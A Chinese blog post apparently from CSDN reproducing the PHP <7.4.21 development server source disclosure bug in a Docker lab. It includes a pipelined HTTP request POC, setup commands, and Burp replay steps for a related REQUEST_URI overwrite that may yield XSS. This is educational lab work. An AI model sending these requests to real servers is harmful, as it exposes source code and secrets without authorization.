PHP 7.4.21 development server 源码泄露漏洞复现

于 2024-08-25 19:34:19 发布
阅读量259 收藏 5
点赞数 11
分类专栏: 漏洞复现 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68483928/article/details/141533583
版权

原漏洞地址:https://blog.projectdiscovery.io/php-http-server-source-disclosure/

版本:PHP<7.4.21

漏洞成因:

通过:PHP -s 开启的内置web服务器存在源码泄露漏洞,可以将PHP文件作为静态代码直接输出源码

POC:

GET /phpinfo.php HTTP/1.1  //这里的phpinfo.php必须是存在的文件,也就是要读取源码的文件
Host: 192.168.xxx.xxx:xx
 
 
GET / HTTP/1.1

漏洞复现:

kali虚拟机下载docker

apt-get install docker.io
启动docker

service docker start
docker拉取PHP 7.4.21的镜像

docker pull php:7.4.21 
运行镜像 将docker 的80端口映射到kali的8080端口

docker run -it -p 8080:80  4ad229e4e700  /bin/bash
创建phpinfo.php

echo "<?php phpinfo();?>" > phpinfo.php
启动php web server

php -S 0.0.0.0:80
访问192.168.xxx.xxx:8080 //kali的地址


ok开始抓包,发送到repeater模块

PS:一定能要关闭自动更新Content-Length

然后写入payload

REQUEST_URL覆盖

php<= 7 . 4 . 21 development server源码泄露漏洞中还提到了一个历史漏洞:在解析HTTP请求的过程中,当某些回调被多次调用的时候,$_SERVER[‘REQUEST_URL’]变量回被自身的一个子串覆盖。

这个漏洞没有太大的危害,但是有时候可能会导致XSS

首先

用python生成长度为500的随机字符串

import random
import string 

def get_random_string(length):
    return ''.join(random.choice(string.ascii_letters) for _ in range(length))

我们在访问的文件?后面多次粘贴这个字符串,然后多次发包

本来响应的链接中的应该是以/文件名开头的,最后却变成
在这里插入图片描述
然后我们将响应包中的字符串放到请求包中搜索,删除最后一个匹配结果

然后多次重放(发包),最后可能会有一次造成XSS注入攻击

Eileen Seligman
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP<=7.4.21 Development Server源码泄露漏洞 例题
m0_75178803的博客
03-15 950
打开题目dirsearch扫描发现存在shell.php
php<= 7 . 4 . 21 development server源码泄露漏洞复现
Kawakaze_JF的博客
09-19 1638
前一段时间在看羊城杯wp里了解到了这个漏洞,觉得挺有意思尝试复现一下(这里附上原漏洞地址。
PHP<=7.4.21 Development Server源码泄露漏洞
这周末在做梦的博客
03-05 3861
因为特殊的原因CTF荒废了一段时间,近期总算再次捡了起来,算是从头开始了吧。近期比赛刚好遇到了这个漏洞,看国内似乎还没有过多的论述,先总结一波。
2023 HW 必修高危漏洞集合
holyxp的博客
07-21 3305
高危风险漏洞一直是企业网络安全防护的薄弱点,也成为 HW 攻防演练期间红队的重要突破口;每年 HW 期间爆发了大量的高危风险漏洞成为红队突破网络边界防护的一把利器,很多企业因为这些高危漏洞而导致整个防御体系被突破、甚至靶标失守而遗憾出局。HW 攻防演练在即,输出HW 必修高危漏洞手册,意在帮助企业在 HW 攻防演练的前期进行自我风险排查,降低因高危漏洞而“城池失守”的风险。
C++工程实践经验
kamo54的专栏
01-17 9215
1 C++ 工程实践经验谈 陈硕 (giantchen@gmail.com) 最后更新 2012-4-20 版权声明 本作品采用“Creative Commons 署名 -非商业性使用 -禁止演绎 3.0 Unported 许可 协议 (cc by-nc-nd)”进行许可。http://creativecommons.org/licenses/by-nc-nd/3.0/ 内容
PHP PHP7.4.30 程序及常见组合rpm 包打包下载
07-27
标题中的“PHP PHP7.4.30 程序及常见组合rpm 包打包下载”指的是这个压缩包包含了PHP 7.4.30版本的程序及其常用扩展的RPM包,这些RPM包是为Linux系统设计的软件安装格式。PHP是一种广泛使用的开源服务器端脚本语言,...
php-7.4.33(多平台软件包)
05-29
php-7.4.33.tar.bz2 php-7.4.33.tar.gz php-7.4.33.tar.xz php-7.4.33-nts-Win32-vs16-x64.zip php-7.4.33-nts-Win32-vs16-x86.zip php-7.4.33-Win32-vs16-x64.zip php-7.4.33-Win32-vs16-x86.zip ...
php-7.4.33安装
11-17
php-7.4.33安装包
php-7.4.29.zip 包含windows下的php安装包、windows下的运行依赖 和 Linux下的源码包。
04-18
php-7.4.29.zip 包含windows下的php安装包、windows下的运行依赖 和 Linux下的源码包。php-7.4.29.zip 包含windows下的php安装包、windows下的运行依赖 和 Linux下的源码包。php-7.4.29.zip 包含windows下的php...
php-7.4.10.tar.gz
09-07
**PHP 7.4.10 知识点详解** PHPPHP:Hypertext Preprocessor)是一种广泛使用的开源服务器端脚本语言,特别适用于Web开发,并可嵌入到HTML中。PHP 7.4.10是PHP的第七个主版本系列中的一个更新版本,发布于2020年9...
推荐一个完全自由的目录设计网站
qq_30049249的博客
08-22 437
因此,如果想在网站上写一本自己的书,我们需要一个目录设计的工具。现在,我们点击全部,看到自己的所有文章。这样,先创建各级栏目,再将文章拖动到各级栏目,就实现了对文章到整理。上面的链接提供参考,这里主要介绍其中的目录设计工具,也叫栏目设计。好,现在我们来出一本书,想一个名字,就叫《学习PHP动态网站开发》如果我们能通过网站出一本书,这将是一件很酷的事。事实上,我们通过网站发布知识,最常见的是写博客。先点击所有,查看子栏目和文章,然后进行拖动排序。好,本文说的是完全自由的目录设计,有多自由呢?
day32(8/20)——playbook剧本安装nginx、roles
wh992610的博客
08-21 858
roles(⻆⾊): 就是通过分别将variables, tasks及handlers等放置于单独的⽬录中,并可以便捷地调⽤它们的⼀种机制。假设我们要写⼀个playbook来安装管理lamp环境,那么这个playbook就会写很⻓。所以我们希望把这个很⼤的⽂件分成多个功能拆分, 分成apache管理,php管理,mysql管理,然后在需要使⽤的时候直接调⽤就可以了,以免重复写。就类似编程⾥的模块化的概念,以达到代码复⽤的效果。
linux基本指令
m0_64450406的博客
08-20 711
vi/vim有三种基本模式:普通模式(Normal Mode)、插入模式(Insert Mode)和命令行模式(Command-line Mode)。-t 或 --date=时间:使用指定的时间(而不是当前时间)来设置文件的访问和修改时间。-d 或 --date=字符串:使用指定的字符串来设置文件的访问和修改时间。进入vi/vim:在终端中输入vi或vim后跟文件名,如果文件不存在,将创建该文件。-r 或 --reference=文件:使用指定文件的访问和修改时间来更新目标文件的访问和修改时间。
DHCP原理与配置
WJC_manong的博客
08-20 773
DHCP(DynamicHostConfigurationProtocol,动态主机配置协议)通常被应用在大型的局域网络环境中,主要作用是集中地管理、分配IP地址,使网络环境中的主机动态的获得IP地址、Gateway地址、DNS服务器地址等信息,并能够提升地址的使用率。DHCP作为用应用层协议,它依靠并且使用着传输层中udp协议。对于DHCP中分为客户端,和服务端。客户端用的端口为68,服务端的端口为67。
web渗透测试 学习导图
qq_48368964的博客
08-20 945
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
WordPress禁止后台自定义功能
xiaoyuya
08-20 263
wordpress后台可以彻底禁止主题的自定义菜单功能,下面这段代码添加到functions.php文件中,后台外观菜单中的”自定义”就会消失不见了。小代码解决大问题,你学废了嘛。
更换域名后图片不显示
最新发布
weixin_52675595的博客
08-22 225
一、2.3.2版本以下版本:可以使用命令行:php think reset:imagePath http://old.com --url http://new.com。原因:系统中图片是带域名存储在数据的,所以更换域名后,图片地址还是以前的域名,所以访问不到;可以替换部分图片的地址,但是还有部能替换的只能重新上传图片,或者完善这个命令。以下两个方法都是只能更换部分图片,并不是全部的,所以域名更换需谨慎。平台 - 维护 - 安全维护 - 清楚缓存 更换域名。问题:系统更换域名后,图片不显示了;
设备运维故障排查与修复技巧
一去二三里...的博客
08-22 999
运维中最常见的个故障问题及其解决方法
php-7.4.21.tar.gz下载
11-27
PHP-7.4.21.tar.gz是PHP编程语言的一个版本压缩包,可以从官方网站或镜像站点下载。这个压缩包包含了PHP-7.4.21版本的源代码和其他必要文件。 要下载PHP-7.4.21.tar.gz,您可以按照以下步骤进行: 1. 打开您的浏览器,并打开PHP官方网站 (https://www.php.net/) 或者镜像站点,如国内的PHP中文网站 (https://www.php.cn/)。 2. 在网站的搜索框中输入"PHP-7.4.21.tar.gz",然后按下回车键或点击搜索按钮。 3. 在搜索结果中找到与"PHP-7.4.21.tar.gz"相关的下载链接。通常,压缩包会被放在一个"下载"或"发布"的页面中。 4. 点击下载链接,弹出一个下载对话框,询问您保存文件的位置。您可以选择保存在您的计算机的任何位置。 5. 选择一个目录并单击保存按钮,下载过程将开始。 6. 下载完成后,您可以通过文件管理器或终端访问下载的文件。 请注意,根据您的网络速度和服务器负载,下载过程可能需要一些时间。此外,确保从可信的来源下载压缩包,以确保文件的完整性和安全性。 一旦您成功下载了PHP-7.4.21.tar.gz压缩包,您可以通过解压缩它来获得源代码和其他必要文件,从而可以开始在您的项目中使用PHP编程语言
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值